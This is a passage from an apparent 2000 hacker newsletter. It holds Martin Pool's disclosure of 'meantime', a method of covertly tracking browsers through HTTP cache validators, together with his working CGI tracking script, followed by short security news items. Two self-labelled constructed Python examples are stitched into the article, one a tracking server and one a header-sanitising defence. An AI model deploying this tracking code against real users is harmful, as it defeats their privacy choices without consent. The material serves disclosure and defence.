      responses is the HTTP `Cookie' state-management extension. The Cookie 
      response header allows a server to ask the client to store arbitrary short 
      opaque data, which should be returned for future requests of that 
      server matching particular criteria. Cookies are commonly used to store 
      per-user form defaults, to manage web application sessions, and to 
      associate requests between executions of the user agent. 

      The user agent always has the option to just ignore the Set-Cookie 
      response header, but most implementations default to obeying it to 
      preserve functionality. Cookies can optionally specify an expiry time 
      after which they should no longer be used, that they should persist 
      on disk between client sessions, or that they should only be passed over 
      transmission-level-secure connections. 

      The privacy implications of cookies have been extensively discussed, and 
      several problems have been found and rectified in the past. One example 
      of privacy compromise through cookies is the use of cookies attached to 
      banner images downloaded from a central banner server: the same 
      cookie is used within images linked from several servers, and so the user 
      can be tracked as they move around. 

      other approaches

      An obvious means to associate requests is by source IP address. Over the 
      short term this will generally work quite well, as a client is likely to 
      use a single IP address during a browsing session. Even then it is 
      complicated by proxies acting for multiple clients, network address 
      translation, or multiuser machines. Over a longer term, the information is 
      convolved by dynamically-assigned IPs, mobile computers moving between 
      networks, dialup pools and the like. Indeed, cookies were proposed in 
      large part to allow legitimate stateful applications to cope with the 
      impossibility of uniquely identifying users by IP address. 

      Within a single site, state may be maintained by generating dynamic URLs 
      that include session identification either within the hostname 
      (http://d9128309812.crackmonkey.org/) or path 
      (http://crackmonkey.org/d213213213/faq.html). However, this does not 
      allow tracking between sites and causes a significant loss of 
      functionality because URLs cannot be shared between users or bookmarked. 

      Single links can be identified by the HTTP Referer header. There are some 
      limitations here, however: this only identifies the immediately preceding 
      resource, and the link is lost if the user re-enters a URL by hand or 
      retrieves it from a bookmarks file. 

      countermeasures

      Users caring to preserve their privacy have taken various countermeasures 
      against these techniques. 

      To reassure end-users about cookie privacy issues, user agents such as 
      Netscape Navigator, Microsoft Internet Explorer and Lynx allow the user 
      some control. The most basic control is to enable or disable cookies 
      altogether; some user agents allow this to be specified for 
      particular domains. There may be more fine-grained controls, such as only 
      accepting cookies from the same server as the top-level page currently 
      viewed and not from servers for subsidiary requests such as images or 
      frames. 

      The broadest protection is afforded by the use of a proxy local to the 
      browser's machine, such as Internet Junkbuster. This software rewrites the 
      request to strip out identifying browser and cookie information, in 
      addition to attempting to remove advertising banners. 

      Various proxying solutions are available to prevent identification by IP 
      address, such as anonymizer.com and CROWDS. 

      A similar but more powerful attack is possible through the 
      cache-management headers proposed in draft-mogul-http-delta-02. 

      caching in http

      To make access faster and reduce network usage, browsers generally keep a 
      copy of resources such as pages and images that they download. When a 
      client has a cached copy of a page, it can decide either to use the cached 
      copy as is, or to send a request to the server to check that it is 
      up-to-date. 

      When the client sends a request for the copy it has in cache, it sends a 
      conditional request describing the cached copy and asking the server to 
      only transfer the body of the resource if it is newer than the cached 
      copy. 

      The most common means of checking this currently in use is the 
      Last-Modified date header. The server supplies a date in the metadata of 
      the response, and the client returns the same date when sending a 
      conditional request. 

      Other techniques, such as checking the length of the resource body, its 
      MD5 hash, or a unique entity tag (ETag) have also been used. 

      the meantime exploit

      The foundation of the meantime exploit is that the server wishes to `tag' 
      the client with some information that will later be reported back, 
      allowing the server to identify a chain. Cookies are a good approach to 
      this, but their privacy implications are well known and so Bob 
      requires a more surreptitious approach. 

      The HTTP cache validation headers are perfect for this: the validator is 
      provided by the server, stored but never interpreted by the client, and 
      then handed verbatim back to the server on the next matching request. 

      Two headers in particular are useful: Last-Modified and ETag. Both are 
      designed to help the client and server negotiate whether to use a cached 
      copy or fetch the resource again. 

      The general approach of meantime is that rather than using the headers for 
      their intended purpose, Bob's servers will instead send down a unique tag 
      for the client. 

      Last-Modified is constrained to be a date, and therefore is somewhat 
      inflexible. Nevertheless, the server can reasonably choose any second 
      since the Unix epoch, which allows it to tag on the order of one billion 
      distinct clients. 

      ETag allows an arbitrary short string to be stored and passed. It is not 
      so commonly implemented in user agents at the moment, and so not such a 
      good choice. 

      In both cases the tag will be lost if the client discards the resource 
      from its cache, or if it does not request the exact same resource in the 
      future, or if the request is unconditional. (For example, Netscape sends 
      an unconditional request when the user presses Shift+Reload.) Bob 
      has less control over this than he has with cookies, which can be 
      instructed to persist for an arbitrarily long period. 

      The date is only sent back for the exact same URL, including any query 
      parameters. By contrast, cookies can be returned for all resources in a 
      site or section of a site. This makes Bob's job a little harder. 

      Bob therefore should make sure that all pages link to a small common 
      resource: perhaps a one-pixel image. This image is generated by a script 
      that supplies and records a unique timestamp to each client, and records 
      whatever is already present. 
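      The revalidation exchange described under "caching in http" and the way 
      meantime repurposes it, as an added Python 3 example that is not the 
      page's meantime.py and not Martin Pool's code: an in-memory server mints 
      a Last-Modified date per new client, a toy browser cache echoes it as 
      If-Modified-Since, and the server links the requests into one chain. The 
      TagServer and CachingClient classes, the resource name and the placeholder 
      image body are this example's own choices; the header names, the 
      ";length=" suffix handling and the must-revalidate behaviour follow the 
      text above.

```python
# Constructed example: HTTP revalidation reused as a client tag.  Not the
# page's meantime.py; the class and resource names are this example's own.
from datetime import datetime, timedelta, timezone
from email.utils import format_datetime, parsedate_to_datetime

EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


def tag_to_date(tag):
    """Encode integer tag N as the HTTP date N seconds after the Unix epoch."""
    return format_datetime(EPOCH + timedelta(seconds=tag), usegmt=True)


def date_to_tag(http_date):
    """Recover the integer tag from an If-Modified-Since value.  Some old
    browsers append '; length=NNN' to the date, so that suffix is dropped."""
    dt = parsedate_to_datetime(http_date.split(";", 1)[0].strip())
    if dt.tzinfo is None:
        dt = dt.replace(tzinfo=timezone.utc)
    return int((dt - EPOCH).total_seconds())


class TagServer:
    """Serves one small resource whose Last-Modified is a per-client tag."""

    def __init__(self):
        self.next_tag = 0
        self.visits = {}   # tag -> number of requests seen carrying that tag

    def handle(self, request_headers):
        ims = request_headers.get("If-Modified-Since")
        if ims is None:
            # No validator: a new client, a flushed cache, or a forced
            # unconditional reload.  Mint a fresh tag and start a new chain.
            self.next_tag += 1
            tag = self.next_tag
        else:
            # The validator is exactly what we sent earlier: read the tag back.
            tag = date_to_tag(ims)
        self.visits[tag] = self.visits.get(tag, 0) + 1
        # Honest revalidation would answer 304 Not Modified here.  We always
        # send 200 with a body so the cache re-stores the copy with its tag,
        # and must-revalidate makes the client ask again on every visit.
        response = {
            "status": 200,
            "headers": {
                "Last-Modified": tag_to_date(tag),
                "Cache-Control": "private, must-revalidate",
            },
            "body": b"GIF89a...",   # constructed stand-in for a 1x1 image
        }
        return response, tag


class CachingClient:
    """A browser cache that revalidates with If-Modified-Since on each hit."""

    def __init__(self, server):
        self.server = server
        self.cache = {}    # url -> Last-Modified value stored with the copy

    def get(self, url, conditional=True):
        """Fetch url; returns the tag the server assigned to this request.
        conditional=False models Shift+Reload: no validator is sent."""
        headers = {}
        if conditional and url in self.cache:
            headers["If-Modified-Since"] = self.cache[url]
        response, tag = self.server.handle(headers)
        if response["status"] == 200:
            self.cache[url] = response["headers"]["Last-Modified"]
        return tag
```

      Two clients on the same machine, or behind the same IP address, get 
      tags 1 and 2 and keep them across visits; an unconditional reload makes 
      the server hand out tag 3 and the chain restarts, which is exactly the 
      weakness compared with cookies that the text notes.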

      intermediate proxies

      The presence of proxy caches between the client and the server will 
      complicate the situation for Bob, because if the proxy holds a copy of the 
      resource it might satisfy the request locally or change the cache control 
      criteria. In the extreme case, if the proxy does all the caching and 
      the client none, then Bob will identify all requests through that proxy as 
      a single chain. 

      Bob need not despair. Proxy usage is still quite low, and there are some 
      indications that people concerned about anonymity will not route their 
      requests through a proxy that might log them. 

      In fact, a meantime exploit is entirely possible if Bob controls an 
      intermediate proxy. This seems not to be so much of a threat in practice, 
      however, because proxies are most commonly controlled by the 
      administrators of a local network who already have considerable 
      power to trace users. 

      If intermediate proxies or clients implement expiry heuristics then this 
      can interfere with tracking, but not irredeemably so. 

      demonstration

      This very simple demonstration places a tag in your browser's cache, and 
      allows you to associate a short string with it on on our server. It should 
      persist as long as the record remains in your browser's cache. 

      If there are several caches on your system, perhaps for different use 
      profiles, or for different user agents, then each will get one tag. It 
      will not be confused by other people accessing the system from the same 
      machine, by use of different IP addresses, or by cookies being 
      disabled. 

      The demonstration will be easier to understand if your browser is set to 
      `Cache is compared to network on every request'. If that setting is not 
      checked, your access will still be tracked but the fields of the page may 
      not seem to update. 

      This will not work in Lynx. 

      results

      This code is a demonstration of the principle, rather than a full 
      implementation of tracking. Nevertheless: 

           It works quite reliably against Netscape. 

           Lynx apparently never sends conditional requests, and so is safe. 

           Junkbuster does not prevent tracking. 

           anonymizer.com seems to keep a cache on their servers and rewrites 
           the page as it passes through, so it seems to be safe: all 
           anonymizer.com users appear as one. 

      implications

      Anonymizing software should probably strip out all cache headers. 
      Unfortunately this will slow down access and waste network bandwidth, but 
      it seems necessary that the client should not return any information to 
      the server if it is to preserve anonymity. 

      Possibly Alice should ask her client to never refresh cached requests 
      unless explicitly requested: this will maintain performance for the common 
      case of unchanged pages. When the page must be refreshed, she should be 
      careful that no information about the previously cached copy is 
      emitted. 

      If all of Alice's requests were directed through an anonymizing proxy 
      crowd it would be harder to associate the tagged requests with her other 
      activities, but not infeasible. 

      Clients could try to manipulate the modification times to give Bob less 
      room to move: for example, they could round off the time to the lowest 
      minute, and could clip times to be no more than a year from the current 
      date. But this still leaves several bits of the value under Bob's 
      control: even separating users into equivalence classes based on where 
      they first accessed this site might be interesting, for example. 

      Designers of future protocols should consider similar tagging security 
      issues. For example, although ETags solve cache consistency problems 
      better than Last-Modified headers do, they make tracking even easier by 
      allowing the server to store arbitrary data on the client.
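      The client-side defences sketched in this section (strip every cache 
      validator, or round If-Modified-Since to the minute and clip it to the 
      last year), as an added Python 3 example that is not part of the original 
      page: a request-header filter of the kind an anonymizing proxy or a 
      browser could apply before a request leaves the machine, plus a count of 
      how many distinct tags the coarsened date still leaves Bob. The function 
      names, the "strip" and "coarsen" mode names and the one-year window are 
      this example's own choices; the header names are HTTP/1.1's.

```python
# Constructed example: sanitising cache validators before a request is sent.
# Not part of the meantime page; mode names and the window are assumptions.
import math
from datetime import timedelta, timezone
from email.utils import format_datetime, parsedate_to_datetime

# Request headers that echo server-supplied validators back to the server.
VALIDATOR_HEADERS = {"if-modified-since", "if-none-match", "if-range"}


def _parse(http_date):
    """Parse an HTTP date into an aware UTC datetime (UTC assumed if no zone)."""
    dt = parsedate_to_datetime(http_date)
    if dt.tzinfo is None:
        dt = dt.replace(tzinfo=timezone.utc)
    return dt.astimezone(timezone.utc)


def coarsen_date(http_date, now, window=timedelta(days=365)):
    """Round an HTTP date down to the minute and clip it into [now - window, now].
    'now' is also an HTTP date string so the function is easy to test offline."""
    dt = _parse(http_date).replace(second=0, microsecond=0)
    upper = _parse(now).replace(second=0, microsecond=0)
    lower = upper - window
    dt = min(max(dt, lower), upper)
    return format_datetime(dt, usegmt=True)


def sanitize_request_headers(headers, mode, now):
    """Return a copy of the request headers with validators removed ("strip")
    or with If-Modified-Since blurred and the rest removed ("coarsen")."""
    if mode not in ("strip", "coarsen"):
        raise ValueError("mode must be 'strip' or 'coarsen'")
    out = {}
    for name, value in headers.items():
        key = name.lower()
        if key not in VALIDATOR_HEADERS:
            out[name] = value
        elif mode == "coarsen" and key == "if-modified-since":
            # Drop any '; length=NNN' suffix first, then blur the date.
            out[name] = coarsen_date(value.split(";", 1)[0].strip(), now)
        # Every other validator is dropped in both modes: an ETag can carry
        # arbitrary server-chosen data, so there is nothing safe to keep.
    return out


def tag_space(window=timedelta(days=365), granularity=timedelta(minutes=1)):
    """How many distinct If-Modified-Since values survive coarsening, and the
    number of bits that still gives Bob per client."""
    n = int(window / granularity) + 1
    return n, round(math.log2(n), 1)
```

      Stripping is the only mode that returns nothing of the server's choosing, 
      at the bandwidth cost the text mentions: without a validator every visit 
      is a full transfer. Coarsening keeps most of the caching benefit but, 
      as tag_space() shows, a one-year window at one-minute resolution still 
      leaves about nineteen bits, enough to partition users finely.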

      references

           There was some discussion of problems with Last-Modified on the HTTP 
           Working Group mailing list, but it seems they didn't identify the 
           privacy problems. 

      revision history

      2000-03-28 Cleared up the explanation. 

      2000-03-29 Further revise the text after feedback from OzLabs hackers. 

           Add Cache-Control headers to the demo to try to be more in the style 
           of HTTP/1.1. Add a form through which users can record a string 
           associated with their cache. Also keep track of how many times they 
           have visited the page. 

           Test against anonymizer.com and junkbuster. 
           
           
      The code:
      
      #! /usr/bin/python
      
      # $Id: meantime.py,v 1.3 2000/03/29 05:47:03 mbp Exp $
      # Copyright (C) 2000 by Martin Pool.
      
      #    This software is provided 'as-is', without any express or implied
      #    warranty.  In no event will the authors be held liable for any damages
      #    arising from the use of this software.
      
      #    Permission is granted to anyone to use this software for any purpose,
      #    including commercial applications, and to alter it and redistribute it
      #    freely, subject to the following restrictions:
      
      #    1. The origin of this software must not be misrepresented; you must not
      #       claim that you wrote the original software. If you use this software
      #       in a product, an acknowledgment in the product documentation would be
      #       appreciated but is not required.
      #    2. Altered source versions must be plainly marked as such, and must not be
      #       misrepresented as being the original software.
      #    3. This notice may not be removed or altered from any source distribution.
      
      
      import cgi
      from os import environ
      import gdbm
      from sys import stdout, stderr
      from time import gmtime, asctime, ctime, time
      from string import find
      
      def nice_get(dict, key):
              if dict.has_key(key):
                      return dict[key]
              else:
                      return None
      
      def log(str):
              stderr.write(str + '\n')
      
      form = cgi.FieldStorage()
      
      # Persistent store: maps each tag (a fake Last-Modified date) to the
      # string the client chose, plus a per-tag visit counter and the 'Next'
      # sequence number used to mint new tags.
      datafile = gdbm.open('mtdata', 'c')
      
      method = nice_get(environ, 'REQUEST_METHOD')
      if method == 'POST':
              # The form posts back the tag it was given, so the string can be
              # attached to the right cache entry.
              ims = form['tag'].value
              newvalue = form['newvalue'].value
      
              datafile[ims] = newvalue
              value = newvalue
              log('updated key %s to %s' % (ims, value))
      else: # method == 'GET' i hope
              # A conditional GET echoes our earlier Last-Modified date back as
              # If-Modified-Since: that date is the client's tag.
              ims = nice_get(environ, 'HTTP_IF_MODIFIED_SINCE')
              if ims:
                      log('got ims "%s"' % ims)
                      # there might be extra parameters after the date such as the
                      # length, but we ignore them
                      pos = find(ims, ';')
                      if pos > 0:
                              ims = ims[:pos]
                      value = nice_get(datafile, ims)
                      log('retrieved value %s for key %s' % (`value`, `ims`))
              else:
                      # No validator: a new (or flushed) cache.  Mint the next
                      # sequence number and encode it as the date that many
                      # seconds after the Unix epoch.
                      next = int(nice_get(datafile, 'Next') or 0)
                      next = next + 1
                      datafile['Next'] = str(next)
                      ims = asctime(gmtime(next))
                      log('Generated new fake time %s' % ims)
                      value = None
      
              if value is None:
                      value = '%s:%s %s' % \
                              (nice_get(environ, 'REMOTE_ADDR') or 'Unknown',
                               nice_get(environ, 'REMOTE_PORT') or 'Unknown',
                               asctime(gmtime(time())))
                      datafile[ims] = value
                      log('remembering value "%s" for key "%s"' % (value, ims))
      
      
      count_key = ims + ';count'
      count = nice_get(datafile, count_key)
      if count is None:
              count = 1
      else:
              count = int(count) + 1
      datafile[count_key] = `count`
      
      datafile.close()
      
      # nph- script: the status line is written by us, not the web server.
      # Always answer 200 with a body (never 304) so the client re-stores the
      # resource together with the tag; must-revalidate makes it send a
      # conditional request, and so the tag, on every later visit.
      stdout.write("HTTP/1.1 200 OK\r\n");
      stdout.write("Content-Type: text/html\r\n");
      stdout.write("Last-Modified: " + ims + "\r\n");
      stdout.write("Cache-Control: private\r\n");
      stdout.write("Cache-Control: must-revalidate\r\n");
      stdout.write("\r\n");
      
      stdout.write("""<p>Your browser's cache has just been tagged and tracked
      by <a href="http://www.linuxcare.com.au/mbp/meantime/">meantime</a>.  You
      have visited this resource <b>%d</b> times using this tag.
      
      <form action="nph-meantime.cgi" method="POST">
      <input type="hidden" name="tag" value="%s">
      <input type="text" name="newvalue" size="80" value="%s">
      <input type="submit" value="Remember me!">
      </form>
      """ % (count, ims, value))
      
      cgi.print_environ()
      
      @HWA
      
165.0 HNN:Apr 3rd:Identity Theft On the Rise 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      
      contributed by royb 
      Identity theft is on the rise; while it is not a new crime, law enforcement
      officials credit the Internet with its rising popularity. (Glad to see
      the NY Times using words other than hacker to equate criminal.)
      
      NY Times
      
      http://www.nytimes.com/library/tech/00/04/biztech/articles/03theft.html
      
      (no article - pay site leeches - Ed)
      ----------
      
      @HWA
      
166.0 HNN:Apr 3rd:Computer Crime Laws 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      
      contributed by acopalyse 
      An interesting site that lists the computer crime statutes for most of
      the 50 states and several countries.
      
      Lady Sharrow
      
      http://www.ladysharrow.com/Library/LAWS/
      ----------
      
      @HWA
      
      
167.0 HNN:Apr 4th:Computers Turned Into Bombs Via The Net 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by Sean 
      Arnold Yabenson, president of the Washington-based consumer group
      National CyberCrime Prevention Foundation (NCPF) claims that a
      purposely written email attachment can have the potential to change
      the electrical current and molecular structure of the central
      processing unit causing a violent explosion. (There is no date on this
      but this has to be an old April Fools joke.)
      
      Weekly World News
      
      http://www.weeklyworldnews.com/stories/1450.html
      ----------
      
      (yeah you guessed it its a 404, probably not missing much either heh
      - Ed)      
      
      @HWA
      
168.0 HNN:Apr 4th:GlassBook Knew of Vulnerabilities in King Book 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by Evil Wench 
      Glassbook, publisher of Stephen King's 66-page novella that was
      released for sale on-line, announced prior knowledge of security
      vulnerabilities in the applications used to read the book. Use of
      these insecure applications enabled piracy of the book.
      
      PC World
      
      http://www.pcworld.com/pcwtoday/article/0,1510,16009,00.html
      ----------
      

                  Hacking the Bullet 

                  The rush to release Stephen King's e-book
                  compromised piracy safeguards.

                  by Christine McGeever, Computerworld 
                  April 3, 2000, 9:09 a.m. PT 

                  Now that pirated versions of the popular 66-page
                  electronic novella by Stephen King, "Riding the Bullet,"
                  have surfaced, the electronic book's distributor,
                  Glassbook, will release a more secure version of its
                  e-book reader. 

                  Glassbook President Len Kawall says that the updated
                  version will be available next week, equipped with
                  security features that should have been present for the
                  King book release. But in the hurry to get the book out
                  to market, a less robust reader was used. 

                  As a result, Kawall says, someone "chiseled in" to the
                  content of the book after downloading and opening it in
                  the reader. He adds that encryption technology used to
                  transmit the book securely on the Internet was not
                  compromised. 

                  However, the version of the book reader used with
                  King's novella was vulnerable from the start, and both
                  Glassbook and "Riding the Bullet" publisher Simon &
                  Schuster knew it. Kawall says that Glassbook wanted
                  to distribute the book with a reader that had 64-bit
                  encryption, but couldn't make the publisher's deadline
                  with the updated reader. 

                  In addition, the specification used to secure the book in
                  transmission hasn't yet been formalized by the
                  standards group behind it, the Book Industry Study
                  Group. The Electronic Book Exchange specification
                  hasn't been presented in a finished draft, nor has it
                  been presented in any manner for industry review,
                  according to BISG spokesperson Sandra Paul. 

                  The BISG was formally announced on March 28, two
                  weeks after the King book was released. 

                  Kawall adds that "Simon & Schuster absolutely
                  understands" how a security breach could occur and
                  that the industry "has learned to live with piracy." He
                  cites the 400,000 to 500,000 legitimate copies of the
                  book in distribution compared to what he estimates to
                  be "a few" pirated copies. 

                  Adds Kawall, "It is not the end of e-books. Our job is to
                  make it more pleasurable to purchase the product from
                  a legitimate source." 

                  Meantime, Glassbook has announced the new reader
                  and posted on its Web site "aggressive steps" it plans
                  to take "to stem e-book piracy." The steps outlined
                  include forming a full-time antipiracy support team that
                  will search the Internet for pirated material, work with
                  the publisher to remove illegally published material, and
                  cooperate with the FBI and international authorities to
                  monitor, track, and report suspected digital piracy and
                  copyright infringement. 
      
      
      @HWA
      
169.0 HNN:Apr 4th:Alabama Man Charged With 5k In Damage to ISP 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/ 
      
      contributed by Eric 
      Brian Michael Jacobs, 23, of Mobile, Alabama was arraigned by U.S.
      Magistrate Bert W. Milling Jr. last Wednesday. He has been charged
      with knowingly transmitting "code and commands to the computer of an
      Internet Service Provider (ISP)" which resulted in more than $5,000 in
      damage. He faces a potential sentence of up to five years in federal
      prison and $250,000 in fines.
      
      Alabama Live
      
      http://www.al.com/news/mobile/Mar2000/28-a344051a.html
      ----------
      

              Man faces charges of
                computer hacking 

         03/28/2000
         By CHRISTINE HAUGHNEY
         Register Staff Reporter 

         A former Eagle Scout and son of a former Mobile
         philanthropist faces federal charges for alleged computer
         hacking. 

         Brian Michael Jacobs, 23, of Mobile was arraigned by
         U.S. Magistrate Bert W. Milling Jr. last Wednesday on
         charges that on May 16, 1999, he "knowingly transmitted
         code and commands to the computer of an Internet
         Service Provider (ISP)" which resulted in more than
         $5,000 in damage. The combined charges carry up to five
         years in federal prison and $250,000 in fines. 

         In the computer world, Jacobs assumed the code name
         Blaxthos, court documents state.

         A 1995 Murphy High School graduate and Eagle Scout,
         Jacobs briefly attended Auburn University before leaving
         in March 1996. Jacobs was convicted on state charges in
         Lee County in 1996. But Ronald Myers, the former
         prosecutor on the case, said that he could not comment
         further on the charges because Jacobs was a youthful
         offender at the time. 

         His father, Michael Jacobs, who had worked as executive
         director of the Medical Society of Mobile County Inc.,
         died in 1997. 

         Court documents list Jacobs as a "permanent" resident of
         Miami, Fla., where he is working. But a Mobile address
         also was listed in court documents. 

         Milling, however, released him with the requirements that
         he "refrain from any use or unlawful possession of a
         narcotic drug and other controlled substances" and that he
         "undergo random urinalysis; also drug and alcohol
         treatment as deemed appropriate." 

         At Wednesday's hearing, Jacobs' attorney, Arthur
         Madden, mentioned a dispute with the U.S. attorney's
         office about failing to provide documents it had against
         Jacobs. 

         "The government has had eight months to get ready to do
         this," Madden told Milling. 

         The court scheduled Jacobs' case for May. 

                 (c) 2000 Mobile Register. Used with permission.


      
      
      @HWA
      
170.0 HNN:Apr 4th:Federal Web Site Security Called Weak (Again) 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      
      contributed by Evil Wench 
      Members of the House cyber security team told lawmakers (again) on
      Monday that government web sites have weak security. An additional
      $250 million was requested to fund cyber security pilot programs at
      five agencies. A request was also made to exempt cooperating companies
      from the Freedom of Information Act when sharing proprietary
      information with the government following a cyber attack. (Freedom
      from FOIA will make absolutely no difference and will further erode
      the peoples' rights.)
      
      Government Executive Magazine
      
      http://www.govexec.com/dailyfed/0400/040400b1.htm
      ----------
      
     April 4, 2000

     DAILY BRIEFING

     Federal Web site security called
     weak

     By Juliana Gruenwald, National Journal's Technology Daily

     While many of the government's computer systems are secure,
     federal agencies' Web interfaces with the public are the weakest
     links, two security experts told lawmakers Monday. 

     Members of the House cybersecurity team and other lawmakers
     toured computer security firms in Northern Virginia Monday,
     including online security firm Global Integrity. Company
     President Dan Wooley and William Marlow, the company's
     executive vice president, also cited the need to provide
     companies with some exemption from the Freedom of
     Information Act to ensure that proprietary information that they
     share with the government about a cyberattack is not revealed.
     Reps. Tom Davis, R-Va., and James Moran, D-Va., are
     expected soon to introduce a bill addressing that issue.

     In the area of computer security, House cyber team leader J.C.
     Watts, R-Okla., chairman of the House Republican Conference,
     and four other House members sent a letter Friday to Rep.
     Harold Rogers, R-Ky., chairman of the House Appropriations
     Commerce, Justice and State Subcommittee, requesting that
     $250 million be appropriated to fund an information security pilot
     program at five agencies. The agencies include the Defense and
     State Departments and the Environmental Protection Agency,
     which has been criticized for its information security practices. 

     "Governmentwide policies for the management of programs that
     support the cost-effective security of federal information
     systems remain inadequate," Watts wrote along with Davis and
     Reps. Pete Sessions, R-Texas, James Rogan, R-Calif., and Bill
     McCollum, R-Fla. 

     Rep. Bob Goodlatte, R-Va., said he would like to see the Clinton
     administration hold an international summit on cybersecurity. If
     the administration fails to act, he suggested that Congress may
     have to pass a resolution urging the president to take such an
     action. 

     "There's a great need for greater international cooperation" on
     the issue, Goodlatte said. 

     On the tour, Wooley said denial of service attacks and damage
     to a company's reputation were the biggest potential losses for
     companies when they are attacked. An employee showed a
     group of lawmakers how a hacker might break into a bank Web
     site and potentially steal money from an account.       
      
      @HWA
      
      
      
171.0 HNN:Apr 4th:Germans Propose Strike Force For Net Defense 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      
      contributed by acopalyse 
      A secret committee of the German government has released a study it
      has been working on for two years. The study concluded that Internet
      attacks will replace ground wars in the coming years. The group, which
      included several government groups warned that attacks could be
      targeted against military or civilian computer systems. The group also
      proposed a 'strike force' to help defend critical sites. (How does a
      'strike force' defend anything?)
      
      ZD Net
      
      http://www.zdnet.com/zdnn/stories/newsbursts/0,7407,2504525,00.html?chkpt
      ----------
      Germany eyes Web security
      After almost two years of study, a secret
      committee of the German government has
      concluded that Internet attacks will supplant
      military conflicts in the coming years, according
      to German magazine "Der Spiegel." The group,
      which encompasses several ministries, security
      forces and the chancellorship warned that attacks
      could interfere with sites belonging to the military
      as well as key civil institutions such as the police,
      power utilities and health services. "There is no
      more national territory" that can be defended
      militarily, the group reports; it went on to propose
      a "strike force" within the German federal office
      for security that could address attacks on critical
      sites. -- Susanne Rieger, ZDNet Germany;
      translation by Matthew Rothenberg, ZDNet News 
      
      @HWA
      
172.0 HNN:Apr 4th:New Mags are Now Available. 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by chri 
      Issue 10 of Krash has been released. Rogue Transmission issue #3 is
      now available.
      
      Krash
      Rogue Transmission
      
      http://www.krash.org.uk
      http://www.geocities.com/solidex
      ----------
      
      @HWA
      
      
173.0 HNN:Apr 5th:De Beers Releases Personal Info 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/ 
      
      contributed by William Knowles 
      adiamondisforever.com recently released the names, addresses, phone
      numbers and e-mail of over 35,000 customers. The web site, sponsored
      by De Beers, is part of The Diamond Information Center (DIC). Site
      administrators quickly fixed the hole that allowed the information to be
      accessible.
      
      C|Net
      
      http://news.cnet.com/news/0-1007-200-1639327.html?tag
      ----------
      @HWA
      
174.0 HNN:Apr 5th:CFP In Toronto 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      
      contributed by Evil Wench 
      The Tenth Computers, Freedom and Privacy conference got underway
      yesterday in Toronto, Canada. Anonymity on the Internet is one of this
      year's hottest topics.
      
      The Computers Freedom and Privacy Conference
      PC World
      
      http://www.cfp2000.org/
      http://www.pcworld.com/pcwtoday/article/0,1510,16043,00.html
      ----------
      
 
      Can Net Infrastructure
      Protect Privacy? 
 
      Privacy conference panelists debate control
      implications of domain name system.
 
      by Rebecca Sykes, IDG News Service 
      April 4, 2000, 3:45 p.m. PT 
 
      As the world grapples with how and whether to control
      the Internet, a model surfaced at the Computers,
      Freedom, and Privacy conference held in Toronto this
      week to let control--and individuals' civil liberties--flow
      not from legislation but from the Net's infrastructure
      itself.
 
      "We're trying to use technology to build a civil-liberties
      infrastructure," says Lenny Foner of the Media Lab at
      Massachusetts Institute of Technology.
 
      One sticky Internet issue with control implications is
      the domain name system, which provides the
      human-friendly monikers such as "Amazon.com" and
      their corresponding numerical Internet Protocol
      addresses.
 
      "Whoever gets to decide who receives the names gets
      to decide, in a sense, how visible" people and
      companies are on the Internet, MIT's Foner says.
 
      Currently the company most associated with the
      domain name system, Network Solutions, manages
      top-level domain servers, including .com, .net, and .org,
      under a four-year contract awarded last November by
      the U.S. Department of Commerce. The Herndon,
      Virginia-based Network Solutions is not the sole
      naming player in the system, but the vendor's clout is
      evident from the $21 billion stock deal that VeriSign
      worked out last month to acquire Network Solutions.
 
      Thwarting the Squatters
 
      Panelists contemplated how to confound that
      near-centralized control of the Net while retaining its
      operational value.
 
      One possibility would be to permit multiple names,
      Foner says. Such a move would cut into the power of
      an organization to grant the name and would also
      thwart "land grabs," where squatters purchase all
      possible permutations of a company's name, Foner
      adds.
 
      An initial search for a specific company's Web site
      using the current convention, for example, "ibm.com,"
      might list multiple, dramatically different sites.
      However, once the IBM site was reached, its location
      could be cached on the user's computer, so that a
      second query on "IBM" would quickly bring the user to
      that same site, according to Foner.
 
      But one panelist was concerned that relying on caches
      was not in keeping with the way people use computers.
      Increasingly, users access the Internet from many
      sources, not from just their home or work PC, says
      Lance Cottrell of Anonymizer.com. "People will have an
      expectation that, if they've always typed in one name to
      get to a place," they will always be able to use that
      name, Cottrell says.
 
      Another panelist said that a system in which names
      were not unique would never pass muster with powerful
      electronic commerce players.
 
      "They're going to hate the idea that a user could type in
      'AT&T' or 'British Telecom'" and not get to those
      corporate sites, says Jonathan Weinberg of Wayne
      State University. "Major e-commerce players are not
      going to use this."
 
      Important e-commerce companies are not the only
      ones who value having unique and easily reachable
      names, according to Phil Zimmermann, the creator of
      the encryption software Pretty Good Privacy.
 
      "I would like to be able to know that if I type in
      'barnesandnoble.com' that I get Barnes and Noble,"
      Zimmermann says.
      
      @HWA
      
      
      
175.0 HNN:Apr 5th:Enigma Machine Stolen From Museum 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      
      contributed by Evil Wench 
      The Abwehr Enigma G-312 was stolen from its resting place in a glass
      display case at Bletchley Park Trust on April 1st. This specific
      variant of the machine is said to be one of only two known to exist.
